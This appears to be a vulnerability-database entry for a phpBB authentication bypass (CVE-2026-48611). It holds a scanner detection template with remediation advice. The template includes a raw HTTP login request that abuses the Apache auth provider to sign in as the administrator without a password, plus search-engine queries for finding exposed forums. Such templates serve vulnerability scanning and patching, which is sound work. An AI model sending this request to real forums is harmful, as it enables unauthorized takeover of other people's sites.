| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Exploit for CVE-2026-48611 | 19 Jun 202610:28 | – | githubexploit | |
| CVE-2026-48611 | 12 Jun 202605:00 | – | circl | |
| CVE-2026-48611 | 12 Jun 202602:27 | – | cve | |
| CVE-2026-48611 | 12 Jun 202602:27 | – | cvelist | |
| EUVD-2026-36375 | 12 Jun 202602:27 | – | euvd | |
| CVE-2026-48611 | 12 Jun 202604:17 | – | nvd | |
| PT-2026-48826 | 12 Jun 202600:00 | – | ptsecurity | |
| Missing Authentication for Critical Function | 12 Jun 202604:05 | – | snyk | |
| CVE-2026-48611 | 12 Jun 202602:27 | – | vulnrichment |
id: CVE-2026-48611
info:
name: phpBB < 3.3.17 - Authentication Bypass
author: aikido,DhiyaneshDk
severity: critical
description: |
phpBB before 3.3.17 contains an authentication bypass vulnerability in the login-link feature. By setting the auth_provider query parameter to "apache", an unauthenticated attacker can bypass password verification and log in as any user, including administrators. The Apache auth provider trusts the Basic authentication header username without password verification, as it assumes Apache handles authentication upstream.
impact: |
An unauthenticated attacker can log in as any user including administrators, gaining full control over the phpBB forum, leading to data theft, defacement, and complete forum takeover.
remediation: |
Upgrade phpBB to version 3.3.17 or later.
reference:
- https://www.aikido.dev/blog/authentication-bypass-phpbb-technical-writeup
- https://nvd.nist.gov/vuln/detail/CVE-2026-48611
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-48611
cwe-id: CWE-287
cpe: cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: phpbb
product: phpbb
shodan-query: http.component:"phpBB"
fofa-query: app="phpBB"
tags: cve,cve2026,phpbb,auth-bypass,vuln
http:
- raw:
- |
POST /ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46eA==
login_username=admin&login_password=x&login=Login
matchers-condition: and
matchers:
- type: word
part: set_cookie
words:
- "phpbb_sid"
- "phpbb"
condition: and
- type: status
status:
- 302
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation